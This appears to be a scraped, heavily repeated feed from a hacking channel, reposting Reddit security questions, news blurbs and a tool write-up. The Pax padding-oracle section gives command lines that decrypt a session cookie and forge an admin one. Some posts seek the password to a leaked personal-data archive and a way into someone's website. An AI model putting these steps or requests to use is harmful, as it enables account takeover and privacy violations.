hacking: security in practice
How to screen record a (windows pc) app that detects and blocks screen recording?
I’ve been screen recording an app on my windows desktop using the program OBS. At some point the app updated to a version that detects and blocks screen recording. My screen looks normal while recording, but when I go back and view the recordings themselves, the app window is blacked out.
Is there any way around this?
And
Is there anyway to unblack out the app window on the already existing recordings?
Please help!!
submitted by /u/anything97365
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to screen record a (windows pc) app that detects and blocks screen recording?
I’ve been screen recording an app on my windows desktop using the program OBS. At some point the app updated to a version that detects and blocks screen recording. My screen looks normal while recording, but when I go back and view the recordings themselves, the app window is blacked out.
Is there any way around this?
And
Is there anyway to unblack out the app window on the already existing recordings?
Please help!!
submitted by /u/anything97365
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community
Dark Reading: Attacks/Breaches
Plug Your Data Leaks: Integrating Data Loss Prevention into Your Security Stack
The average cost of a data-exposing cybersecurity incident is $4.35 million. If your business can’t avoid to pay, make sure you’ve got a strong data loss prevention practice in place.
___________________________
@hacking_Attack
@Hacking_Video
Plug Your Data Leaks: Integrating Data Loss Prevention into Your Security Stack
The average cost of a data-exposing cybersecurity incident is $4.35 million. If your business can’t avoid to pay, make sure you’ve got a strong data loss prevention practice in place.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Plug Your Data Leaks: Integrating Data Loss Prevention into Your Security Stack
The average cost of a data-exposing cybersecurity incident is $4.35 million. If your business can’t avoid to pay, make sure you’ve got a strong data loss prevention practice in place.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
DevSecOps 101: Pre-commit hooks with Talisman and gofindapis
https://cdn-images-1.medium.com/max/1000/0*p1OAgpzosgv2hmlO
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
DevSecOps 101: Pre-commit hooks with Talisman and gofindapis
https://cdn-images-1.medium.com/max/1000/0*p1OAgpzosgv2hmlO
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
DevSecOps 101: Pre-commit hooks with Talisman and gofindapis
Introduction
hacking: security in practice
Laptop Suggestion for hacking/programming
Hey guys , I want to get a laptop mainly for hacking & programming,I was thinking about having more cores but don't know which brand to go, (windows only below 900$ or 75k INR) can you guys share your suggestions(laptop names) regarding this.
submitted by /u/vinay737
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Laptop Suggestion for hacking/programming
Hey guys , I want to get a laptop mainly for hacking & programming,I was thinking about having more cores but don't know which brand to go, (windows only below 900$ or 75k INR) can you guys share your suggestions(laptop names) regarding this.
submitted by /u/vinay737
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Laptop Suggestion for hacking/programming
Hey guys , I want to get a laptop mainly for hacking & programming,I was thinking about having more cores but don't know which brand to go, can...
hacking: security in practice
Learn How To Modify Windows ISOs to make your own Windows 10 "Lite"
Original XDA Thread:
https://forum.xda-developers.com/t/how-to-make-a-lite-or-modded-windows-iso-tool-premade-lite-win-10-iso.4496967/
Hello Friends~!
Today I bring you a guide that teaches you how to use a built in Windows program called Dism.exe to remove unwanted installed programs on windows installation isos. You are also able to embed your own apps. Works on all Windows!
For a full walkthrough with pics, video, download links, and sources, see my XDA thread above!
submitted by /u/Long-Cap6202
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Learn How To Modify Windows ISOs to make your own Windows 10 "Lite"
Original XDA Thread:
https://forum.xda-developers.com/t/how-to-make-a-lite-or-modded-windows-iso-tool-premade-lite-win-10-iso.4496967/
Hello Friends~!
Today I bring you a guide that teaches you how to use a built in Windows program called Dism.exe to remove unwanted installed programs on windows installation isos. You are also able to embed your own apps. Works on all Windows!
For a full walkthrough with pics, video, download links, and sources, see my XDA thread above!
submitted by /u/Long-Cap6202
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Learn How To Modify Windows ISOs to make your own Windows 10 "Lite"
Original XDA...
hacking: security in practice
Bought a used PC from a friend of a friend
I bought a pc from a guy a year or two ago. It never occurred to me that he could have installed some kind of spyware. Is there a way I can check for this?
I’ve run several full scans on windows defender which haven’t shown anything but I’m still worried there might be something hiding.
Maybe I’m just paranoid
submitted by /u/North_Ad_2067
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Bought a used PC from a friend of a friend
I bought a pc from a guy a year or two ago. It never occurred to me that he could have installed some kind of spyware. Is there a way I can check for this?
I’ve run several full scans on windows defender which haven’t shown anything but I’m still worried there might be something hiding.
Maybe I’m just paranoid
submitted by /u/North_Ad_2067
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Bought a used PC from a friend of a friend
I bought a pc from a guy a year or two ago. It never occurred to me that he could have installed some kind of spyware. Is there a way I can check...
OAuth 2.0 Hacking
https://gowthamaraj-rajendran.medium.com/oauth-2-0-hacking-67e5d2b9b495?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://gowthamaraj-rajendran.medium.com/oauth-2-0-hacking-67e5d2b9b495?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
OAuth 2.0 Hacking 💸
OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on…
OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on…Continue reading on Medium » (https://gowthamaraj-rajendran.medium.com/oauth-2-0-hacking-67e5d2b9b495?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
OAuth 2.0 Hacking 💸
OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on…
Dark Reading: Attacks/Breaches
Malwarebytes Expands OneView Platform for MSPs
Malwarebytes achieves 250% year-over-year MSP partner growth, introduces new modules to enhance protection, detection, and resolution of threats for SMBs.
___________________________
@hacking_Attack
@Hacking_Video
Malwarebytes Expands OneView Platform for MSPs
Malwarebytes achieves 250% year-over-year MSP partner growth, introduces new modules to enhance protection, detection, and resolution of threats for SMBs.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Malwarebytes Expands OneView Platform for MSPs
Malwarebytes achieves 250% year-over-year MSP partner growth, introduces new modules to enhance protection, detection, and resolution of threats for SMBs.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
OAuth 2.0 Hacking
https://cdn-images-1.medium.com/max/1280/0*a3CkALHAV_Cd3i7N.jpg
OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
OAuth 2.0 Hacking
https://cdn-images-1.medium.com/max/1280/0*a3CkALHAV_Cd3i7N.jpg
OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
OAuth 2.0 Hacking 💸
OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on…
Kali Linux Tutorials
Pax : CLI Tool For PKCS7 Padding Oracle Attacks
Pax, Exploit padding oracles for fun and profit!
Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:
* Obtain plaintext for a given piece of CBC encrypted data.
* Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.
This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.
As always, this tool should only be used on systems you own and/or have permission to probe!
Installation
Download from releases, or install with Go:
go get -u github.com/liamg/pax/cmd/pax
Example Usage
If you find a suspected oracle, where the encrypted data is stored inside a cookie named
pax decrypt –url https://target.site/profile.php –sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D –block-size 16 –cookies “SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D”
This will hopefully give you some plaintext, perhaps something like:
{“user_id”: 456, “is_admin”: false}
It looks like you could elevate your privileges here!
You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:
pax encrypt –url https://target.site/profile.php –sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D –block-size 16 –cookies “SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D” –plain-text ‘{“user_id”: 456, “is_admin”: true}’
This will spit out another base64 encoded set of encrypted data, perhaps something like:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you can open your browser and set the value of the
Download
___________________________
@hacking_Attack
@Hacking_Video
Pax : CLI Tool For PKCS7 Padding Oracle Attacks
Pax, Exploit padding oracles for fun and profit!
Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:
* Obtain plaintext for a given piece of CBC encrypted data.
* Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.
This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.
As always, this tool should only be used on systems you own and/or have permission to probe!
Installation
Download from releases, or install with Go:
go get -u github.com/liamg/pax/cmd/pax
Example Usage
If you find a suspected oracle, where the encrypted data is stored inside a cookie named
SESS, you can use the following:pax decrypt –url https://target.site/profile.php –sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D –block-size 16 –cookies “SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D”
This will hopefully give you some plaintext, perhaps something like:
{“user_id”: 456, “is_admin”: false}
It looks like you could elevate your privileges here!
You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:
pax encrypt –url https://target.site/profile.php –sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D –block-size 16 –cookies “SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D” –plain-text ‘{“user_id”: 456, “is_admin”: true}’
This will spit out another base64 encoded set of encrypted data, perhaps something like:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you can open your browser and set the value of the
SESScookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Pax : CLI Tool For PKCS7 Padding Oracle Attacks !!! Kali Linux
Pax, Exploit padding oracles for fun and profit! Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles.
hacking: security in practice
Looking for password to a zip file. Anybody know it?
Hi all,
I downloaded a .rar file of the Pipl database leak but it requires a password to open. Anyone happen to know the password? The file name is US-PPL#_toprakbilen90. Sound familiar to anyone?
submitted by /u/ItsAllPartofTheShow
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Looking for password to a zip file. Anybody know it?
Hi all,
I downloaded a .rar file of the Pipl database leak but it requires a password to open. Anyone happen to know the password? The file name is US-PPL#_toprakbilen90. Sound familiar to anyone?
submitted by /u/ItsAllPartofTheShow
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Looking for password to a zip file. Anybody know it?
Hi all, I downloaded a .rar file of the Pipl database leak but it requires a password to open. Anyone happen to know the password? The file name...
hacking: security in practice
this will get buried, but can anybody possibly find the password to this site?
http://incredibleworldtv.com/ I've been trying for months, but to no avail. I've just now found my fan site for the tv show "you asked for it". it features a ton of old log posts about the show and I want to see them again. if anybody could help, please do.
submitted by /u/hambuiscuit
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
this will get buried, but can anybody possibly find the password to this site?
http://incredibleworldtv.com/ I've been trying for months, but to no avail. I've just now found my fan site for the tv show "you asked for it". it features a ton of old log posts about the show and I want to see them again. if anybody could help, please do.
submitted by /u/hambuiscuit
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
this will get buried, but can anybody possibly find the password...
[http://incredibleworldtv.com/](http://incredibleworldtv.com/) I've been trying for months, but to no avail. I've just now found my fan site for...
hacking: security in practice
Using salts and hash when getting a plaintext password.
Has anybody tried cracking a plain text password if you have the salt and hash combination using Hashcat? May I know how to do it? I'm starting to learn this one.
Thanks!
submitted by /u/SS-CoCoNuT
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Using salts and hash when getting a plaintext password.
Has anybody tried cracking a plain text password if you have the salt and hash combination using Hashcat? May I know how to do it? I'm starting to learn this one.
Thanks!
submitted by /u/SS-CoCoNuT
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Using salts and hash when getting a plaintext password.
Has anybody tried cracking a plain text password if you have the salt and hash combination using Hashcat? May I know how to do it? I'm starting to...